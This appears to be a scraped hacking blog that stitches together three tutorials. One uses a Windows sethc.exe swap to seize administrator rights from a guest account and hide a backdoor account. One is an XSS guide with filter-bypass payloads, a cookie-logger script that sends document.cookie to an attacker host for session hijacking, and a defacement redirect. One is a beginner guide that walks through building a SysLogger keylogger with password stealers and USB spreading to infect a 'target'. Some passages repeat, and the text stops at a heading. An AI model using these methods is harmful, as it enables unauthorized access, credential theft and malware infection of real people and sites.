*****Hack administrator from Guest account *****
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend***8217;s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on***8230;
Concept:
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now Log out from your guest account and at the user select window,press shift key 5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type ***8220; NET USER ADMINISTRATOR aaa***8221; where ***8220;aaa***8221; can be any password you like and press enter.
* You will see ***8220; The Command completed successfully***8221; and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing ***8220;NET USER ARMAAN/ADD***8221; where ***8220;ARMAAN***8221; is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
Here create a new DWORD value, write its name as the ***8220;user name***8221; that u created for your admin account and live with your admin account forever
countermeasures
disable regedit
disable stick keys Press shift key 5 times
Sunday, 6 January 2013
Friday, 28 December 2012
Full Ultimate XSS Tutorial
Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lately been flooding, and I've recieved a lot of requests on making this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS.
What is XSS?
XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.
What is HTML and Javascript?
HTML
HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.
Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.
XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet.
Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS.
Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics.
Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.
So, lets try putting in the most known, BASIC query of all time.
That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:
>
It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message :). We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:
Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:
You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:
Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.
Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet.
Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS.
Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics.
Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.
So, lets try putting in the most known, BASIC query of all time.
Code:
<script>alert("XSS")</script>That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:
Code:
<script>alert("XSS")</script>
Code:
<script>alert( > XSS DETECTED < )</script>It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message :). We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:
Code:
String.fromCharCode(88,83,83)Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:
Code:
<script>alert(String.fromCharCode(88,83,83))</script>You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:
Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.
XSS: Advanced Methods
Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN.
Cookie Stealing/Logging
Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.
First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there.
Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)).
Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.
To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.
So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it.
Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it.
First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there.
Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)).
Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
// ==
// URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
// web site you include a credit somewhere on the web site
// with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";
var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for
return encoded;
};
cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);
< ?php
}
?>Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.
To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.
Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it.
Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it.
Defacing
Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)
Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
XSS: Onmouseover
Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this:
We can exploit this, by editing it to:
Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now.
Code:
onmouseover=prompt1337We can exploit this, by editing it to:
Code:
onmouseover=alert("XSS")Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now.
XSS Filter Bypassing Techniques
Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS.
There are many ways on bypassing XSS filters, but I will only explain a few.
There are many ways on bypassing XSS filters, but I will only explain a few.
Hex Bypassing
With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution :) You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:
> = %3c
< = %3c
/ = %2f
> = %3c
< = %3c
/ = %2f
ASCII Bypassing
With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:
NOT WORKING SCRIPT
WORKING SCRIPT
To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful.
NOT WORKING SCRIPT
Code:
<script>alert("XSS")</script>WORKING SCRIPT
Code:
<script>alert(String.fromCharCode(88,83,83))</script>To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful.
Case-Sensitive Bypassing
This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:
You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
Code:
<ScRiPt>aLeRt("XSS")</ScRiPt>You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones.
Some XSS Dorks
It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:
Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent.
Code:
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspxThose dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent.
The COMPLETE beginners guide to hacking
Sections:
1) Introduction
2) The hacker manifesto
3) What is hacking?
4) Choosing your path
5) Where should I start?
6) Basic terminology
7) Keylogging
8) RAT's
9) Java Driveby's
10) Crypters
11) Dosing and DDosing, what's the difference?
12) Staying anonymous
13) Proxies
14) VPN's
15) Alternatives, tips and tricks
16) Extending your knowledge
17) Closing section
SECTION 1 – Introduction
Hi there. If you are reading this, you're either an eager to learn beginner hacker, or an upgraded member here to judge my work. Well, in either case, I'm sure you will enjoy this thread and increase your knowledge of hacking. I will be going over ALL the basics of hacking, and a lot more. I've included tutorials aswell, so you could say this is an all-in-one guide.
SECTION 2 - The hacker manifesto
The hacker manifesto (also known as the conscience of a hacker) is an essay written by a hacker known as 'The Mentor'. It is often said to give an insight into the psychology of hackers. If you are hoping to start learning the art of hacking, this will certainly give you the right mindset for the job. "The Hacker Manifesto by +++The Mentor+++ Written January 8, 1986 Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike."
– Taken from http://www.mithral.com/~beberg/manifesto.html
That is the essay. It's quite impressive isn't it? After reading it you should have an idea of the mindset any hacker should have. I read it about 5 months ago and it has certainly sent me on the right track.
SECTION 3 - What is hacking?
What is hacking? Well, whatishacking.org defines it as "the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker. Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it's not limited to either of them." - Taken from whatishacking.org That's a great definition but in my opinion hacking is much more than that. In my opinion, hacking isn't something you can just 'learn'. It's not just a skill, it's an art. Hacking requires knowledge. Knowledge is power. In order to gain said knowledge, and the power that comes with it, a change of lifestyle is required, along with a certain amount of secrecy. Learning 'how' to hack takes time and dedication. There's no easy way to get better at it. That's right, no shortcuts and its unlikely you're going to get a helping hand. Like everything else in life, it takes practice. Don't go crying to others if it doesn't work out, just keep calm and carry on. If you are serious about becoming a hacker, you will need to be willing to change your lifestyle, and dedicate yourself to the task. With enough dedication and hard work you will excel at hacking.
SECTION 4 - Choosing your path
Ask any stranger what a hacker is, they will probably give you a really negative answer; identity theft, hacking accounts, stealing, to name a few. The reality is actually quite different. There are a few kinds of hackers, you probably only know about the bad ones. This section should give you a better understanding of the different kinds of hackers, and help you decide which kind you should become.
Black hat hackers: These are the bad guys you always hear about. These are the people giving other hackers a bad name. Black hat hackers are the ones who commit crime. They steal identities, hack accounts, ddos sites and just go about causing havoc.
Grey hat hackers: Grey hats are basically good guys. They still do illegal stuff, but they report it to the person/company they are targeting. So... Basically they do bad stuff and help people to fix it.
White hat hackers: White hat hackers are the good guys. They fix stuff and help people. They don't do illegal stuff. You've probably never heard of an event where a hacker does something good but these guys do that all the time.
Examples of white hat hackers are:
• Technicians
• Cyber security teams
• IT consultants
Now that you have a better understanding of the 'types' of hackers, you need to choose your path. This requires a lot of thinking, because you need to consider the possibilities of each path. Black hat is the easiest path to choose. It's 'fun' and it has the most benefits. It also is the only one that will get you in trouble and maybe even arrested. Grey hat is a slightly more difficult path. You (technically) are a good guy but most people won't see you as such. Grey hats have a hard time because although they are trying to help, the method they are using isn't really that legal. If you do choose to be a Grey hat, be aware that some people won't believe you are really trying to help, and you may still get in trouble. The last and most difficult path is White hat. As I mentioned before, White hats are the good guys. Their job is to help. Becoming a White hat may seem boring but you are helping people, and that should be a reward in itself. The only problem with becoming a What hat is that you will have to start out as a Black hat. I personally would recommend that you start out as a Grey hat. You'll get more out of it.
SECTION 5 - Where should I start?
This is the question that most people ask. I honestly don't think there is any one place to start. Ask around on any forum and people will always tell you to learn to use RAT's and keyloggers. To be honest I wouldn't recommend doing that straight away. I would advise to learn the basic terminologies of hacking (see section 6) and try to get an idea of exactly what everything means. It's really important to understand stuff before you go downloading random hacking programs from the Internet. It you don't know how to use them, or if they are viruses, you only have yourself to blame.
SECTION 6 - Basic terminology
As I mentioned in the previous section, it is important to have a decent amount of knowledge about hacking before you can start. So I've taken the liberty of typing up a list of common terminologies you should know.
Common terminologies:
Ddos - Distributed denial of service attack. This is where a website is flooded with packets of data from multiple sources and the server basically overloads. Ddos attacks are often confused with Dos attacks.
Dos - Denial of service attack. This is where a site is flooded with packets of data from a single source. A Dos isn't as effective as a ddos, but it is a lot easier, as you can Dos straight from cmd.
404 Error - The error you are given when a site is down. If you have attacked a site and don't see this, your attack wasn't successful.
cmd - Command prompt. This is basically MS-Dos, except it's now just a program with some commands rather than an OS. Cmd can be used to perform tasks using commands.
.bat - Batch file extension. This is the file type which is opened in cmd. Most .bat's that you will see online will be malicious. Some are good though.
RAT - Remote Administration Tool. RAT's are the most commonly used tools by beginner hackers. RAT's are favored because they are easy to use and they perform many functions. They also allow control over of the infected computer, which makes them very popular. Slave - A user which has been infected with your keylogger/RAT.
Keylogger - A program which logs the keystrokes of a computer. These are usually the first things that beginner hackers learn to use. They have a lot of functions but they aren't as good as RAT's.
Crypter - A program used to change the hash sum of a malicious program so that it is undetectable by anti-virus programs.
FUD - Fully UnDetectable. A program which is FUD cannot be detected by ANY anti-virus program. UD - UnDetectable. A program which is UD is mostly undetectable but can be detected by some anti-virus programs.
JDB - Java Driveby. A fake site which contains a java applet. This java applet is used to download and execute (run) a certain program. The slave as to click the 'allow plugin to run' button to start the applet.
Silent Java Driveby - A java driveby that's downloads and executes a file without the user seeing any pop-ups. These are more effective than normal java driveby's as they are less suspicious.
Direct link - The direct download link to a certain file. When you download a file from a site (e.g. Mediafire), you are given a download link which redirects you to a page with a download button. However a direct link is a link which leads directly to the file. There is no download button, the download starts straight away.
FTP - File Transfer Protocol. An FTP server is a server used to store and send files.
OS - Operating system
vb - Microsoft Visual Basic. This is a coding language used to make a lot of programs.
.NET - Microsoft .NET framework. This is another coding language made by Microsoft. It is used to create programs.
C/C+/C++/C# - Commonly use coding languages. They are often used to code games.
IP address - The address used to identify your network while on the Internet. Every computer has a different IP address, and therefore every IP address is unique.
VPN - Virtual Private Network. This is a network you can connect to on a computer. It will give you anonymity while online. A VPN will hide your IP address by tricking sites and programs into thinking you are somewhere you are not.
Proxy - A proxy redirects web traffic through a virtual tunnel to another IP address. A proxy is like a VPN but only tricks websites, not the whole computer. That may seem like a lot of things to remember, but it's not that much considering those are just the basics. Don't let that put you off learning though, once you start to learn one thing, another will follow and so on so forth.
Keylogging
Keylogging is one of the most basic things in hacking. I explained what a keylogger is in section 6. Downloading a good, free keylogger isn't that hard to do. Just search around HackForums and you will find one in about 30 seconds. I would recommend using SysLogger as it is free and really easy to use. It has many features and allows for the logs to be sent via Email or an FTP server. SysLogger has a really nice interface, so you should be able to figure out how to use it. However if you can't figure it out, or would like to know how to use it before getting it, here is a tutorial I typed up a while ago:
Are your friends bothering you? Need to get back at someone? Or do you just want to learn some of the basics of hacking accounts? In any case, this thread will be INCREDIBLY useful to you.
First of all, heres what this method will require and what it will involve:
- Computer (duhh)
- Internet connection
- Keylogger, we will be using one called SysLogger
- Target
- Making a fake program that the target will want to open
- An email (preferably a Gmail)
So, lets get started.
First thing you will need is SysLogger. You can download it at the bottom of the thread.
Open it up. You will be given a message, just click 'OK'.
![[Image: blAuM.png]](http://i.imgur.com/blAuM.png)
It should open up the GUI.
![[Image: iMtab.png]](http://i.imgur.com/iMtab.png)
Tick the following boxes:
- Encrypt email
- Stealers
- Delete cookies
- Block AV sites
- USB spread
- Startup
- Kill Taskman (optional, leave blank if you want this to be more stealthy)
- Force steam
- Clipboard logger
- Screen logger
![[Image: tvzP9.png]](http://i.imgur.com/tvzP9.png)
Those options will do the following:
Stealers = Sends you saved passwords for internet browsers
Block AV site = Stops the slave from checking an antivirus site if they get suspicious
USB spread = Infects any USB devices plugged into the machine, so if they are put into other computers they will infect them
Startup = Runs the keylogger every time the machine is switched back on
Kill Taskman = Stops the slave opening task manager
Clipboard logger = Saves anything copy/pasted
Screen logger - Sends you a screen shot of the victims PC
Next we have to tick the box called 'Enable Error'. This will give the slave an error message when they open the file, make sure you put in something creative, but relevant the fake program.
![[Image: 83Kqa.png]](http://i.imgur.com/83Kqa.png)
Click 'Test Error' to make sure it is working.
![[Image: gHmSR.png]](http://i.imgur.com/gHmSR.png)
Now we need to fill in the mailing options. I recommend using mail as opposed to FTP because it is more secure and its a lot easier. Put in your email address and password. If you are using a Gmail you don't have to change the 'SMTP' options, if you aren't google the SMTP options for your email provider. Click 'test email', if a box pops up saying success, you've done everything right, if not, go back and do it again. There should be a box below that which says 'Interval'. Set that to whatever time you want.
![[Image: 6sJIK.png]](http://i.imgur.com/6sJIK.png)
Now click 'Change file properties'. This will open up another GUI. Find an icon that suits your fake program here
The icon changer might not work for everyone. If it doesn't, download a free icon changer from google.
![[Image: GZmy7.png]](http://i.imgur.com/GZmy7.png)
Close the properties window.
Click 'Build Server'. This will build the keylogging file. Make sure you have your antiviruses disabled as they will delete the file. You can reactivate them when you are done.
Congrats, you've built the keylogger!
Now all you need to do is send it to your slave and get them to open it!
If you accidentally open your keylogger, just open up SysLogger and click 'Cure'. Type in the name of the file and you will be cured.
I hope you guys find this useful!
If you do, please post a thanks.
Hope this helps you guys
SECTION 8 - RAT's
RAT stands for Remote Administration Tool (though some people say it stands for Remote Administration Trojan). You can find a definition of what a RAT is in section 6. As I mentioned in that section, a RAT has a lot more functions than a keylogger. Using a RAT can also allow you to get photos of your slave if they have a webcam. I don't currently have a tutorial on how to use a RAT, so you will have to search for one yourself, sorry about that.
However I do recommend the following RAT's:
• Dark comet (free)
• Blue banana (paid, but very cheap)
They are very easy to use and have many useful functions. In my opinion I think those are the best RAT's around (that don't cost too much).
SECTION 9 - Java Driveby's
